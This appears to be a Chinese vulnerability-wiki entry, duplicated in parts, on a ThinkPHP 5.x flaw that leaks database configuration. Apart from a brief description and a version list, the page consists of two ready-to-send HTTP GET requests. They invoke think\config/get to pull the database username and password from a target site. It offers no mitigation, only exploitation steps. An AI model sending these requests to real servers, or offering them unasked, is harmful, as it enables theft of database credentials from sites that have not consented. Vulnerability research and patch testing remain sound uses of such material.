fofamini-wiki

登录白背景

源码

thinkphp 5.x版本存在数据库信息泄露漏洞

一、漏洞简介

ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.x版本存在数据库信息泄露漏洞

二、影响版本

ThinkPHP 5.x

三、资产测绘

特征

四、漏洞复现

GET /?s=index/think\config/get&name=database.username HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Java/1.8.0_291

GET /?s=index/think\config/get&name=database.password HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Java/1.8.0_291

原文: https://www.yuque.com/xiaokp7/ocvun2/rlui1l6h02qrnvl9

# thinkphp 5.x版本存在数据库信息泄露漏洞

# 一、漏洞简介
ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.x版本存在数据库信息泄露漏洞

# 二、影响版本
+ ThinkPHP 5.x

# 三、资产测绘
+ 特征

![1729964067714-6a67d2ff-29b3-41ad-95e6-3d2ab586db35.png](./img/t9YprvrEyHpghg5F/1729964067714-6a67d2ff-29b3-41ad-95e6-3d2ab586db35-757490.png)

# 四、漏洞复现
```plain
GET /?s=index/think\config/get&name=database.username HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Java/1.8.0_291
```

![1729966115423-75cbba93-7830-4936-9e15-6d737dd7f132.png](./img/t9YprvrEyHpghg5F/1729966115423-75cbba93-7830-4936-9e15-6d737dd7f132-470854.png)

```plain
GET /?s=index/think\config/get&name=database.password HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Java/1.8.0_291
```

![1729966165231-abb02cef-d38a-40e3-baf1-1fdc226be891.png](./img/t9YprvrEyHpghg5F/1729966165231-abb02cef-d38a-40e3-baf1-1fdc226be891-496216.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rlui1l6h02qrnvl9>

fofamini-wiki

thinkphp 5.x版本存在数据库信息泄露漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

三、资产测绘

四、漏洞复现